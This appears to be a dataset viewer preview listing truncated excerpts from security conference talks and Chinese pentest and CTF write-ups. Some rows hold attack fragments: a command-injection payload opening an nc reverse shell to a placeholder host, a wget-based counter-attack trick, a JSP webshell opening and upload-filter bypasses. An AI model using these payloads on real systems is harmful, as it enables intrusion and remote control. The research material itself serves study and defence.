text
stringlengths
100
9.93M
category
stringclasses
11 values
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis C.K Chen (Bletchley) 1 Who am I   C.K Chen (陳仲寬)   P.H.D Student in DSNS Lab, NCTU   Research in   Reverse Engineering   Malware Analysis   Virtual Machine 2 About DSNS   謝續平教授   實驗室研究方向   惡意程式分析   虛擬機器   數位鑑識   網路安全 3 Outl...
pdf
某凌OA前台⽆条件RCE(组合利⽤) 这个其实就是前段时间两个漏洞的结合。 1.SSRF(这⾥应该叫⽂件包含) 2.XmlDecoder反序列化 之前写了⼀个读取密码到后台JNDI的利⽤⽅式 这个⽅法也不是百分百可⾏,后⾯在塔王的提醒下发现了⼀种更为简洁的⽅式。 看⻅有师傅在打了,就放出来了。 其实主要还是在于 <c:import> 这个标签的特性。 之前也有详细介绍过。 <c:import> 标签提供了所有 < jsp:include > ⾏为标签所具有的功能,同时也允许包 含绝对 URL。 举例来说,使⽤ <c:import> 标签可以包含⼀个 FTP 服务器中不同的⽹⻚内容。 既然提供了include的所有功能,那么也可以直接...
pdf
IOT安全 - 测信道实战 演讲人:KEVIN2600 2019 @Kevin2600 议程 . 测信道的那点事 . 测信道案例简析 . 测信道 Power Analysis 测信道的那点事 测信道攻击是一种针对软件或硬件设计缺陷, 剑走偏锋的攻击方式 攻击途径通常采用被动式监听, 或通过特殊渠道发送隐蔽数据信号 攻击点不在暴力破解, 而是通过功耗; 时序; 电磁泄漏等方式达到 破 解 目 的 . 在 很 多 物 理 隔 绝 的 环 境 中 , 往 往 也 能 出 奇 制 胜 测信道 测信道 . Public key signature check . Bootloader 加固 (bootdelay = 0) . 屏蔽调试端口 ...
pdf
REpsych : psycholigical warfare in reverse engineering { def con 2015 // domas This serves no purpose Warning Taking something apart … … to figure out how it works With software… Interfacing Documentation Obsolescence Bug fixing Academic Reverse Engineering? Taking something apart … … to figure ...
pdf
SITCH Inexpensive, coordinated GSM anomaly detection About Me • 2000: Technology career started (I can get paid for this??) • 2003: Started building with Linux • Came to infosec through systems and network engineering, integration • Security tools and integration (SIEM, HIDS, etc…) • Current: R&D About You • Back...
pdf
Introduction Flight of the Bumblebee With bird eyes Taming of the camera Views from up-there Flight Demo A low cost spying quadrotor for global security applications using hacked digital cameras A. Gademer, C. Ch´eron, S. Monat, F. Mainfroy, L. Beaudoin ESIEA Paris / Universit´e Paris-Est (France) DEFCON 17 http://fauc...
pdf
"Hacking Web Apps" – Brent White / @brentwdesign Abstract: Understanding how to exploit vulnerabilities within a web application is beneficial to both breakers and fixers. It is a core skill for penetration testers, and it provides significant insight into secure coding practices for developers. This talk covers...
pdf
State of the Hack: Maltego Use Cases Over the past several years, data has quickly gone from being sparsely collected to hoarded in mounds, locked away in datacenters and spread across the world. Is there really a need to store so much information? That question has yet to be answered, but with advances in modern te...
pdf
NSA Playset: JTAG Implants Introductory Rites ● Electrical Engineering education with focus on CS and Infosec ● 10 years of fun with hardware o silicon debug o security research o pen testing of CPUs o security training ● Hardware Security Training: o Secure RTL design o Low-cost physical attacks o “Applied...
pdf
Copyright © Government Technology Agency. Not to be reproduced without permission. Hacking Humans with AI as a Service Eugene Lim, Glenice Tan, Tan Kee Hock, Timothy Lee DEF CON 29 Disclaimer Materials presented are based on research conducted. Not to be attributed to any entity. Copyright © Government Technology Agen...
pdf
GeekPwn CTF WP AuthorNu1L Team GeekPwn CTF WP WEB noXSS 2020 rtmpdump cosplay! umsg Re easyydre Androidcmd babyre Pwn BabyPwn PlayTheNew EasyShell ChildShell WEB noXSS 2020 .... Cross Origin Opener Policy <!DOCTYPE html> <html lang="en"> <head> <script> function cb(win,c) { if(win.frames.length == 0...
pdf
One-Liners to Rule Them All egypt wvu What this is Bash basics ● Minor portability considerations One-liners and demos of stuff we find to be useful @egyp7 @wvuuuuuuuuuuuuu What this isn’t Linux system administration ● Although there is some amount of overlap Reading the man page to you @egyp7 @wvuuuuuuuuuuuuu `man ba...
pdf
Iftach Ian Amit Managing Partner Security Art Down the rabbit Hole Agenda • Background on research • The server – first impressions • Doors, windows, whatever you want to call these… • Dances with lawyers • Slip sliding down the hole – Tools – Scripts – Logs, logins, and other “soft” data • Meanwhile – CERT‐CC and othe...
pdf
wordpress <5.8.3 对象注入漏洞 本文仅用于技术讨论与研究,文中的实现方法切勿应用在任何违法场景。如因涉嫌违法造成的一切不良 影响,本文作者概不负责。 本文由本人在今年2月份发表于奇安信攻防社区 https://forum.butian.net/share/1303 ,因此在 一些关于时间的描述上存在误差,请谅解。 0x00 漏洞描述 看了 wordpress 注入( CVE-2022-21661 )的洞之后,发现还存在另外一个对象注入漏洞,具有管理 员权限的用户通过更改一些选项,将有机会 getshell 。 0x01 漏洞影响 getshell 的条件: wordpress < 5.8.3 启用多站点模式 存在一...
pdf
PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Popping a Smart Gun DEF CON 25 plore@tuta.io PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON What is a smart gun? • Gun that can be fired only by authorized parties • Various authorization/authentication approaches – Biometrics (e.g., fingerprint rea...
pdf
YOUR COMOANYS NAME Python动态代码审计 演讲人:聂心明 2 0 1 8 自我介绍 •亚信安全软件工程师 •n0tr00t团队成员 •个人博客:https://blog.csdn.net/niexinming •个人github地址:https://github.com/niexinming •大型项目,代码结构复杂 •有些危险的功能隐藏较深(危险的定时计划任务、sqlite数据库任意创建导致任意 文件覆盖……) •提高效率 为什么会想到动态代码审计? 漏洞 数据库 敏感函数 文件读写 网络访问 日志 PART 01 数据库日志 目录 CONTENTS PART 02 Hook关键函数 PART 03 结合A...
pdf
De Gustibus* Adventures in Hacking Taste Sandy Clark (Mouse) Erin (Edw0rd) Defcon 09 *De Gustibus Non Est Disputandem Confessions of a Foodie • Hackers in Norway (the motivation for this talk) Confessions of a Foodie • Hackers in Norway (the Motivation for this talk) • The child is the maker of the Mouse Confessions ...
pdf
A DIRTY LITTLE HISTORY Bypassing Spectre Hardware Defenses to Leak Kernel Data 1 2 Vrije Universiteit Amsterdam Enrico Barberis Herbert Bos Cristiano Giuffrida Marius Muench Pietro Frigo 2 TL;DR • Spectre affects most modern CPUs ○ You can leak data across privilege levels (e.g., User-to-Kernel) • CPU vendors release...
pdf
(ps:x86_pie&x86_srop入门题) 文件链接:https://pan.baidu.com/s/17pIc0RrfLRH9arMbJmJGjA  提取码:4olb  环境搭建: 1.查看文件信息及保护机制 got表只读,NX,PIE都开了 2.ubuntu运行ida*32远程调试文件,打开ida32对程序进行分析 函数窗口中未发现可以函数,打开main函数,发现只有一个read函数,并且可以栈溢出。 3.远程调试,断点于main函数第一行,运行 4. 看到程序运行后,ida中的模块窗口出现这些,则有: 一.根据pie的特性,最后12位不变,多次加载程序后,发现libc的基址前三位也是不变,也 就是只需爆破8位即可 二.可...
pdf
shawn.webb@hardenedbsd.org Twitter: @lattera HardenedBSD Internals Agenda ● About Me ● De<nitions ● About HardenedBSD ● Features ● Weather Report ● Digging In About Me ● Cofounder of HardenedBSD ● Security enthusiast ● Opensource advocate ● Evangelist of FreeBSD ● ZFS fanboy De<nitions Security De<nitions Expl...
pdf
Invisible Access Opening New Doors to Insecurity Marc Weber Tobias - Matt Fiddler - Tobias Bluzmanis ©2009 Security.org Agenda • Standards and Requirements • Electro-Mechanical Locks • Critical Infrastructure and Vulnerabilities • Real World Threats • Case Studies Standards • Why we need Standards • What They Measure •...
pdf
Maltego’s (Local) Partner in Crime Nadeem Douba | www.cygnos.com How you doin’ Nadeem Douba | www.cygnos.com 2 }  Nadeem Douba ◦  Work at Cygnos (http://www.cygnos.com) in Ottawa, ON, Canada ◦  Certs: GWAPT, GPEN ◦  Worked in the InfoSec field for 10+ years. ◦  Love (European) football and hacking stuff… }...
pdf
N Stage Authentication with Biometric Devices Presented by: Nate Rotschafer Sophomore Peter Kiewit Institute Revised: July 8, 2002 N Stage Authentication  Outline – Background on Authentication – General Network Security – Need for High Grade Authentication – Need for Multiple Factor Authentication – Background on Er...
pdf
SECURITY PAPER Preparation Date: 11 Dec 2016 Art of Anti Detection – 3 Shellcode Alchemy Prepared by: Ege BALCI Penetration Tester ege.balci<at>invictuseurope.com INVICTUS 2 Security Paper TABLE OF CONTENT 1. Abstract:.........................................................................................................
pdf
Duplicating Restricted Keys Billy & Bobby Graydon Outline 1. Keyways 2. Other Stuff How keys work How Key Cutting works How keyways work 3D Printing The Old Approach to Keyway Research Our Approach to Keyway Research C: E: F: ∩: ∪: BEST A Bump Key Pic of CPC arrow press d...
pdf
Revoke-Obfuscation > PowerShell Obfuscation Detection Using Science Daniel Bohannon - @danielhbohannon Lee Holmes - @Lee_Holmes 0.0/00 > Whois 0.0/00 - MANDIANT Senior Applied Security Researcher - Invoke-Obfuscation, Invoke-CradleCrafter - Obfuscation, evasion and detection techniques - @danielhbohannon Title . @Speak...
pdf
Social attacks against anonymity networks Nick Mathewson The Tor Project <nickm@torproject.org> Defcon XV Aug 4, 2007 That title was confusing! ● What I mean by “social attacks.” ● What I mean by “anonymity network.” ● How to be a more effective social engineer. Not covered here ● Intro to anonymity networks. – Basics ...
pdf
Introduction to Unicornscan Introducing Unicornscan RIDING THE UNICORN Unicornscan is an open source (GPL) tool designed to assist with information gathering and security auditing. This talk will contrast the real world problems we’ve experienced using other tools and methods while demonstrating the solutions that Unic...
pdf
1 新型句话连接原有句话 @yzddMr6 1.jsp Payload 密码test 1 <%@ page import="javax.script.ScriptEngineManager" %> 2 <%@ page import="javax.script.ScriptEngine" %><% 3 try { 4 ScriptEngine engine = new ScriptEngineManager().getEngine ByName("js"); 5 engine.put("request", request); 6 engine.put("respon...
pdf
Hacking Your Thoughts: Batman Forever meets Black Mirror Katherine Pratt DEFCON 27 10 Aug 19 The Standard Disclaimer The work in this presentation was done at the University of Washington as part of a PhD dissertation. The results and views presented here do not necessarily represent those of my funding sources or m...
pdf
05 Nov 19 Breaching the perimeter - PhantomJs Arbitrary file read Introduction PhantomJS is a headless browser used for automating web page interaction. PhantomJS provides a JavaScript API enabling automated navigation, screenshots, user behavior and assertions making it a common tool used to run browser-based unit tes...
pdf
滲透測試 基本技巧與經驗分享 講者: 趙偉捷 自我介紹 ID : OAlienO 姓名 : 趙偉捷 學校系所 : 國立交通大學 電機資訊學士班 大二升大三 社群 : Bamboofox 目錄 滲透測試 - Penetration Test ( PT ) 情境一 : 收集情報 情境二 : 資料洩漏 情境三 : SQL injection 情境四 : XSS 情境五 : XST 情境六 : CSRF 情境七 : File Upload Vulnerability Common Vulnerabilities and Exposures ( CVE ) Bug Bounty 與漏洞通報 滲透測試 Penetration Test ( PT...
pdf
JDBC内存Dump密码 - 1 JDBC内存Dump密码 引⾔ 在红队⾏动中经常会遇到拿到 Webshell 后找不到数据库密码存放位置或者是数据库密码被加密的情况(需要逆向代码查找解密逻辑)。 在此提出两种在从运⾏时获取所有的数据库连接信息(密码)的⽅式 第⼀种⽅式实现效果 服务端数据库加密 Demo 成功获取到解密后的数据库密码 插件已经集成到哥斯拉 https://github.com/BeichenDream/Godzilla/releases/ JDBC内存Dump密码 - 2 实现原理⽅式⼀ ⼀般不使⽤数据库连接池情况下 我们通常使⽤ Java 的⼯⼚类 DriverManager 获取数据库连接 Java 跟进逻辑...
pdf
XIII / I / MMIII DefCon XI Bluesniff - The Next Wardriving Frontier Bruce Potter <gdead@shmoo.com> Brian Caswell <bmc@shmoo.com> XIII / I / MMIII DefCon XI Bluetooth Basics • NOT 802.11! NOT a relative of 802.11! • Cable replacement technology – Low power for embedded devices • More BT radios than 802.11 radios in e...
pdf
1 dogcs 4.4 patch补丁分析 声明 加⼊我们的社区 前⾔ ⽂件对⽐ JAVA端 aggressor/Aggressor.class aggressor/AggressorClient.class aggressor/browsers/Connect.class aggressor/browsers/Sessions.class aggressor/dialogs/AboutDialog.class aggressor/dialogs/ConnectDialog.class aggressor/headless/Start.class aggressor/MultiFrame.class aggressor/TabMan...
pdf
PUBLIC THREAT HUNTING, THE NEW WAY HITCON PACIFIC 2017 In Ming, Wei Chea PUBLIC INTRO 1 In Ming (胤銘) Loves MMA Wei Chea (偉傑) Loves diving & my dog ½ Taiwanese PUBLIC We are not involved in ALL the information we are sharing today. Many of the information (use cases, tools) we going to discuss are made possible by...
pdf
void fake_image_path(WCHAR *img_path) { __asm { // PEB mov eax, fs:[0x30] // _RTL_USER_PROCESS_PARAMETERS mov eax, [eax+0x010] // ImagePathName.Buffer add eax, 0x3C push img_path pop [eax] } } int main() { HWND game = FindWindow(NU...
pdf
tomcat整体架构和处理请求的流程 tomcat源码调试 以 tomcat8.5.68 为例 首先下载tomcat源代码:tomcat8 创建资源文件目录。在任意文件夹下可以创建一个文件夹,用于存放配置文件,站点信息等。我创 建的 catalina_home 新建pom.xml,使用maven管理项目,导入调试所需要的依赖包 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0"         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ...
pdf
Somerset Recon Infecting the Embedded Supply Chain Zach Miller Alex Kissinger Somerset Recon Introduction - Who We Are Zach: ● Reverse Engineering, Pen Testing ● Twitter: @bit_twidd1er Alex: ● Barista that occasionally does security things @ Somerset Recon ● Cappuccinos, Hardware Hacking, Reverse Engineering Somerse...
pdf
Please insert inject more coins Defcon XXI Press start x 2 Me ?  Nicolas Oberli (aka Balda)  Swiss security engineer  CTF enthusiast  Retro gamer  Beer drinker / brewer x 3 It all started so simply...  I wanted to add coin handling to my MAMEcab  Bought a coin acceptor on an auction site x 4 Coin handli...
pdf
Andrea Marcelli (@_S0nn1_) Twitter Email Web PhD Student Security Researcher The signature generation problem The algorithm Introducing YaYaGen Demo A unique pattern Syntactic signatures * this is where the most of the existing tools and researches focus on Semantic signatures Android malware Reduce Automate 100...
pdf
PUT ON YOUR TINFO_T HAT MIAUBIZ DEFCON 23 AUGUST 7TH 2015 C++ templates template <typename Type> Type max(Type a, Type b) { return a > b ? a : b; } specialized char max<char>(char a, char b) { return a > b ? a : b; } specialized uint32_t max<uint32_t>(uint32_t a, uint32_t b) { return a > b ? a : b...
pdf
Asura: A huge PCAP file analyzer for anomaly packets detection using massive multithreading Ruo Ando National Institute of Informatics DEF CON 26 Abstract—Recently, the inspection of huge traffic log is im- posing a great burden on security analysts. Unfortunately, there have been few research efforts focusing on scalabi...
pdf
Business logic flaws in mobile operators services B o g d a n A l e c u Bogdan ALECU About me Independent security researcher Sysadmin Passionate about security, specially when it’s related to mobile devices; started with NetMonitor (thanks Cosconor), continued with VoIP and finally GSM networks / mobile phones @mse...
pdf
原始默认状态: 1 2 3 ——WebKitFormBoundary2smpsxFB3D0KbA7D Content­Disposition: form­data; name=”filepath”; filename=”backlion.asp” Content­Type: text/html 突破0,文件名前缀加[0x09]绕过: 1 2 3 ——WebKitFormBoundary2smpsxFB3D0KbA7D Content­Disposition: form­data; name=”filepath”; filename=”[0x09]backlion.asp” Content­Type: text/html 突破1,文件...
pdf
The Cavalry Isn’t Coming Starting the Revolution to FSCK it all! Nicholas J. Percoco & Joshua Corman @c7five @joshcorman Introductions Introductions @c7five Introductions @c7five @joshcorman Backwards & Forward I’ve Had Dreams I’ve Had Dreams Nightmares Dangerous Precedents Hitting Rock Bottom Hittin...
pdf
1 Call the plumber – You have a leak in your (named) pipe Gil Cohen 2 • Presenter introduction • Key terms • Connecting to named pipes • Pipe ACLs And Connection Limitation • Named pipes in the wild Agenda • Enumerating And Scanning For Named Pipes • Sniffing Named Pipes Content • Fuzzing Named Pipes • Exploitation And...
pdf
THE UNBELIEVABLE INSECURITY OF THE BIG DATA STACK AN OFFENSIVE APPROACH TO ANALYZING HUGE AND COMPLEX INFRASTRUCTURES SHEILA A. BERTA (@UnaPibaGeek) WHO AM I? Head of Security Research at Dreamlab Technologies (Swiss Infosec Company) SHEILA A. BERTA (@UnaPibaGeek) ● Offensive Security Researcher - I like to break ev...
pdf
XCTF WP Author:Nu1L XCTF WP PWN cpp qemuzz GAME Reverse divination Web mine1_1 mine2 pyer webshell_1 hids PWN cpp UAFlibcfree_hook from pwn import * # s = process("./chall") s = remote("124.70.12.210","10002") def add(idx,buf): s.sendlineafter("> ",str(0)) s.sendafter("> ",buf) s.sendlineafter("> ",str(idx)...
pdf
I Know What You Are By the Smell of Your Wi-Fi Denton Gentry @dgentry denny@geekhold.com We’re here today to talk about a mechanism which identifies the type of device connecting to a Wi-Fi network. It can be quite specific: it can tell the difference between an iPhone 5 and an iPhone 5s, between a Samsung Galaxy ...
pdf
1 jboss jboss RPC RCE 分析 JDNI 2022年4⽉27⽇13:28:14 看到⼀个帖⼦提到jboss 漏洞,就去Twitter找了链接 https://jspin.re/jboss-eap-as-6-rce-a-little-bit-beyond-xac-xed/ https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf 简单分析了下pdf的内容,漏洞不是传统的http漏洞,是jboss⾥的remoting3存在问题,可参考 weblogic的T3,只是jboss是跑在独⽴的端⼝上。 4446: JBoss R...
pdf
DSCTF WriteUp By Nu1L DSCTF WriteUp By Nu1L Crypto picproblem approximate RAS-330 Pwn fuzzerinstrospector Re catchme FFunction Misc Muti Operations Web pingpingping easy_tou Crypto picproblem from math import sqrt from numpy import array, zeros, uint8 import cv2 image = cv2.imread('encflag.jpg') imagearray = array(imag...
pdf
回顾⼀下goby反制讨论的⼀些⼩技巧做个记录 限制前提 1. ⾃动转⼩写 2. 不能有空格 群友提供的⼀些思路 ftk提供的 r4提供的win下的 7师傅提供的数组⽅式,不过不知道为啥我的shell好像不⾏ ftk提供的利⽤已经有的命令切割其中字符最终获得空格,不过id的话需要知道⽤户名,得找个别的命令 ⽐较完整的 js 我有点弱智,我能注⼊javascript我却在那边绕shell 所以使⽤javascript的⼀些编码就可以了,⽐如base64、url编码等。就不再说了。 我还整了个没啥⽤的 onerror=\"x=('a'+''['concat'])[9];cmd='/usr/local/bin/wget'+x+'127.0....
pdf
MSF渗透常用操作指南 一、msf安装与更新 在服务器或者虚拟机执行(linux) curl https://raw.githubusercontent.com/rapid7/metasploitomnibus/master/config/template s/metasploit-frameworkwrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall 然后验证是否安装成功 输入msfconsole Windows安装 点击下载 https://windows.metasploit.com/metasploitframework-latest....
pdf
TV White Spaces: The Next Wi-Fi? Doug Mohney Editor-in-Chief VON Magazine DEFCON 15, August 2007 Who am I ? 30 second intro • Contributor to Mobile Radio Technology (www.mrtmag.com) since January 2003. • Hearing policy wonks talk about 700 MHz, unlicensed spectrum in D.C. for years. • Day job: Editor-in-Chief, VON M...
pdf
Privacy in DSRC connected vehicles Defcon 21 – August 3, 2013 whoami •  BSEE, digital communications •  Many years as a network engineer •  Santa Clara University Law student •  Research assistant providing technical expertise on privacy audits and reviews •  Contracted by auto consortium to review privacy of...
pdf
0x00 zacnday ndaygetshellgetshell 0x01 getshell nday stampcookie stamp cookiecookie rce ping ping target 1. whoamiping 2. pwdping 3. bashshshell shell {"method":"ping","params":{"count":"1","size":"256","target":"`mknod backpipe p && nc xxxx 9999 0<backpipe | /bin/sh 1>backpipe `www.guahao.com","noParse":true}} sh...
pdf
What  the  Watchers  See Weaknesses  in  Municipal  Mesh Network  Deployments Dus8n  Hoffman  &  Thomas  (TK)  Kinsey DEF  CON  22 Dus8n  Hoffman the  researcher,  not  the  actor  :’( •  Senior  Engineer  @  Exigent  Systems •  Principal  @  various  other ...
pdf
安服崽笔记_flex-messaging-core-4.7.2.jar AMF 反序列化 AMF 反序列化常用的利用链有 MetaDataEntry、ReplicatedTree 和 UnicastRef 等等 Externalizable 实现类 本次主要记录 MetaDataEntry 利用链 文章写的异常垃圾、凌乱,跟着代码看文章可能会好一些, 代码里很多父类引用指向子类对象的地方,我都有说明为什么会调用某个实现类的方法。 Src 目录下 Test.java,可以辅助了解 amf 协议格式。 靶场地址:https://github.com/jiashaoxiong1998/amfDemo 导入 idea,配置个...
pdf
用Golang编写 dll劫持的一些坑 (1) 源于知识星球的一个想法,利用一些已知的dll劫持的程序作为"模板",自动生成白加黑的程序。 我想用Golang编写劫持的dll,这样也方便可以做成在线平台。 当然dll加载模式不同劫持的方式也不同。 我找到是vscode它的更新程序,也有它官方的签名 看 inno_updater.exe 的导出表,我只用实现它的5个函数就可以了。 因为我想做成通用型的,对于这种输入表导入的dll做劫持,只需要在 DllMain 中获取主程序的入口点, 然后将shellcode写入入口点,之后主程序运行就会执行我们的shellcode了。 C代码如下 测试过是能够正常使用的。 但是把它转成Go的过程中,...
pdf
编码规范之 phpmailer 的安全隐患 By:奥村燐 1.众所周知,phpMailer 是一个非常强大的 php 发送邮件类,可以设定发送邮件地址、回复 地址、邮件主题、html 网页,上传附件,并且使用起来非常方便。 2.但是如果开发编码不规范,可能会导致安全问题的出现,下面实例讲解在什么场景下会 出现安全隐患。 3.例如 eyoucms 找回密码,点击发送的时候,会调用 Smtpmail 控制器的 send_email 方法 4. 然后又在 send_email 方法中调用了 SmtpmailLogic.php 文件中的 send_email 5.最后在 SmtpmailLogic.php 最后又调用了 send...
pdf
酒票 35 贡献 0 积分 46 注册时间 2013-1-31 发消息 c4rt1y 九零元老 发表于 2016-4-17 06:31:25 | 只看该作者 表哥已经在https://forum.90sec.org/forum.php?mod=viewthread&tid=9133这里写了一些方法,今晚在看别人的代 了,于是乎,今晚测试了下安全狗的上传,发现方法还是如此,依旧没任何变化,当然我们只拿安全狗为案列,因为方 过狗方法,这里感谢keio牛文档,我虽然也做了类似的,但是排版没你的好,就拿你的放上去了。 默认状态 [Bash shell] 纯文本查看 复制代码 突破0 [Bash shell] 纯文本查看 ...
pdf
Microsoft Portable Executable and Common Object File Format Specification Microsoft Corporation Revision 6.0 - February 1999 Microsoft Portable Executable and Common Object File Format Specification IMPORTANT—READ CAREFULLY: This Microsoft Agreement (“Agreement”) is a legal agreement between you (either an indiv...
pdf
Hacker'Machine,Interface, State,of,the,Union,for,SCADA,HMI,Vulnerabili:es, Copyright,2016,Trend,Micro,Inc., 2, Introduc:on, Copyright,2016,Trend,Micro,Inc., 3, Trend,Micro,Zero,Day,Ini:a:ve, •  Fritz,Sands,',@FritzSands, –  Security)Researcher)–)Zero)Day)Ini4a4ve) –  Root)cause)analysis)and)vulnerability)discovery) –  ...
pdf
Truck Duck Board Bill of Materials June 2016 - DEF CON 24 CHECK FOR UPDATES AT: http://truckhacking.github.io Designator(s) Description Package/Footprint Qty Manufacturer Part Number Preferred Vendor Subsitute OK? Notes D1 Power LED 0805 1 OSRAM LG R971-KN-1 Digikey Y PTC1 Thermal Fuse, 2A Hold, 4A Trip Custom 1 Littl...
pdf
Behind the Scenes of the Badge by Joe Grand aka Kingpin Me. electrical engineer. hardware hacker. product designer. Retrospective: DEFCON 14 Retrospective: DEFCON 15 Retrospective: DEFCON 15 Retrospective: DEFCON 16 Retrospective: DEFCON 16 Retrospective: DEFCON 17 Retrospective: DEFCON 17 Badges by Christmas? ★ Fall...
pdf
About This eBook ePUB is an open, industry-standard format for eBooks. However, support of ePUB and its many features varies across reading devices and applications. Use your device or app settings to customize the presentation to your liking. Settings that you can customize often include font, font size, single or dou...
pdf
Portable Privacy Portable Privacy 2006: Darfur, Sudan 1989: Beijing, China 2005: United States of America Portable Privacy Alias: LadyAda Name: Limor Fried Crime: Felony Assault w/ Banana Location: New York, NY Hangouts: Adafruit Industries Notes: Gang member of cow worshipping death cult Last Seen: In the Company of ...
pdf
White Paper // PIN Automatic Try Attack July 12th, 2021 metabaseq.com PINATA ATTACK Salvador Mendoza – Ocelot Offensive Security Team PINATA (PIN Automatic Try Attack) // Summary of Findings It is possible to brute force all 10,000 PIN combinations, from 0000 to 9999, in millions of physical EMV cards. Th...
pdf
Bypass AMSI的前世今生(1) - AMSI前置知识 0x00 前言 《Bypass AMSI的前世今生》是 [公鸡队之家] 知识星球的第一个专项技术分享。之所以选择这个主题作 为第一个主题,是因为AMSI是微软用来对抗无文件攻击而开发的安全模块,是当前攻防对抗前沿的技术 之一。从15年AMSI出现,越来越多的杀软厂商接入了AMSI接口,当前市面上主流杀软均接入此接口。 这给当时以powershell为主的红队工具致命打击。因此随后红队人员针对Bypass AMSI的研究从未停 止。从开始的script混淆到现在的内存补丁,详细的技术演变如下: [BA1] 降级PowerShell版本到2.0(依赖于.Net 3.0,Win...
pdf
30/06/2009 1 Chema Alonso, José Palzón 30/06/2009 2 Metadata: Information stored to give information about the document. ▪ For example: Creator, Organization, etc.. Hidden information: Information internally stored by programs and not editable. ▪ For example: Template paths, Printers, db structure, etc… Lost data:...
pdf
openbms代码审计 项目地址:链接 系统认证逻辑 系统采用thinkphp框架开发,主要是后台 admin 的功能 所有控制器全都继承 AdminBase.php ,认证程序也是在 AdminBase.php 中进行的,在进行父类 的初始化后有两个函数用于登录校验和权限校验-- checklogin() 和 checkAuth() 。 其中这个 checkAuth() 方法设置了白名单, $noLogin , $noAuth 两个数组中的是白名单接口,可 以不进行权限校验,也就是任意用户登录后都可以调用。 后台任意文件上传 看后台的 index 控制器,定义了 $noLogin , $noAuth 两个数组,且其中存在不需要权限...
pdf
Cisco Talos Mahdi Namazifar, PhD DETECTING RANDOM STRINGS; A LANGUAGE BASED APPROACH !  Given an arbitrary string, decide whether the string is a random sequence of characters !  Disclaimer 1: This work does not address strings that are random sequences of dictionary words !  Disclaimer 2: The current parameter...
pdf
AWVS 也有一个插桩模式,我们也来试用一下,先安装好awvs // pull 拉取下载镜像 docker pull secfa/docker-awvs // 将Docker的3443端口映射到物理机的 13443端口 docker run -it -d -p 13443:3443 secfa/docker-awvs // 容器的相关信息 awvs13 username: admin@admin.com awvs13 password: Admin123 AWVS版本:13.0.200217097 1.开启插桩扫描 开启 AcuSensor 如下两张图 图1 未开启AcuSensor 图2 开启AcuSensor,...
pdf
Down With The RIAA Musicians Against the Recording Industry By: Ichabod Ver7 Independent artist/producer www.loopbackimposter.com Priceless • New computer: $900 • I/O box: $500 • Studio monitors and Microphone: $900 • Telling the RIAA to go fsck themselves: Priceless Purpose of this Presentation • This presentation i...
pdf
0x00 前⾔ 有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660 0x01 起因 朋友给某甲⽅做渗透测试,奈何甲⽅是某知名保险,系统太耐⺾,半天不出货 兄弟喊我来⼀块来看,于是有了本⽂ 0x02 客户端RCE⼀处 朋友把靶标发给我看了下,除了两个下载链接啥也没有 链接下载下来的东⻄如图,看了下⽬录⾥⾯还有JRE,那么很显然,这客户端exe就是个JAVA启动命令执⾏套壳 随后打开program⽂件夹,逆了⼀下⾥⾯的Jar full_path前⾯定义为⽤户更新时输⼊的路径 那么很简单了full_path可控,诱导⽤户安装更新时路径出输⼊注⼊命令即可 0x03 发现Webservice Soap接⼝ 光这⼀个⽔来的...
pdf
Embedded System Design: From Electronics to Microkernel Development Rodrigo Maximiano Antunes de Almeida rmaalmeida@gmail.com @rmaalmeida Universidade Federal de Itajubá Portal embarcados The work ”Embedded System Design: From Electronics to Microkernel Development” of Rodrigo Maximiano Antunes de Almeida was licensed...
pdf
One Token to Rule Them All: Post-Exploitation Fun in Windows Environments 06 July 2007 2 Introduction The Increasing Importance of Post-Exploitation • Microsoft Technology is Pervasive • Security has improved significantly since their Trustworthy Computing Initiative • Consequently, Post-Exploitation has become...
pdf
a 30,000 feet look at wi-fi, the freezing spot luiz “effffn” eduardo hello DefCon 17 before we start... DefCon 17 so, why freezing spots? DefCon 17 agenda •motivation •the old and the new •the pieces of the puzzle DefCon 17 •the experiment(s) •next? disclaimer DefCon 17 motivation gts 12 the pieces of the puzzle DefCo...
pdf
前言 本篇文章由 Yii 2.0.35 反序列化漏洞复现到新利用链发现 中发现的新利用连的坑展开的测试. 结果在最后 面 我在文章中提到, poc 加上 phpinfo 才能执行成功. 我当时的猜测是因为 phpinfo 函数执行的回显内容 过大出发了分段传输导致的. 然后我就展开了测试, 测试环境: phpstudy, PHP 7.0.9 利用链调整 文章发出后才发现, 调试时发现利用链中的第二节: \vendor\guzzlehttp\psr7\src\FnStream.php 中 的 __destruct() (对象销毁时)魔术方法就存在危险函数且参数可控, 所以使用这条利用链不需要经过 \vendor\yiisof...
pdf
Radio Exploitation 101 Characterizing, Contextualizing, and Applying Wireless Attack Methods Matt Knight Bastille Networks San Francisco, CA matt@bastille.net Marc Newlin Bastille Networks Atlanta, GA marc@bastille.net Abstract—Reverse engineering wireless physical layers has never been easier, thanks to the commoditiz...
pdf
Blowing up the Celly! Building Your Own SMS/MMS Fuzzer! ! Brian Gorenc, Manager, Vulnerability Research! Matt Molinyawe, Security Researcher! ! © Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.! 2! Agenda! •  Introduction! •  Testing Enviro...
pdf
Defcon Comedy Jam IV: A New Hope For The Fail Whale David Mortman – C3/Securosis Chris Hoff – Juniper Dave Maynor – Errata Rich Mogull – Securosis arry Pesce – NWM/Paul.com Rob Graham - Errata
pdf
High Insecurity: Locks, Lies, and Liability Marc Weber Tobias Matt Fiddler Agenda • Security Standards • Conventional and High Security • UL-437 • ANSI /BHMA (A156.5-2001) • ANSI (A156.30) • LOCKS: – Bypass Methods • LIES: – Representations – Design issues • LIABILITY: – Legal issues High Security Locks and Standards •...
pdf
Advancing Video Attacks with video interception, recording, and replay Defcon 17 July 31st, 2009 Jason Ostrom Arjun Sambamoorthy © 2008 Sipera Systems, Inc. All Rights Reserved. Agenda Introduction Overview of UC Live demo of Video Eavesdropping Live demo of Video Replay and Video Hijack VoIP Pentesting trick Conclusi...
pdf
A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego Philip Tully | Mike Raggo 1 #whoami 2 Philip Tully @phtully Principal Data Scientist at ZeroFOX PhD (KTH & University of Edinburg...
pdf
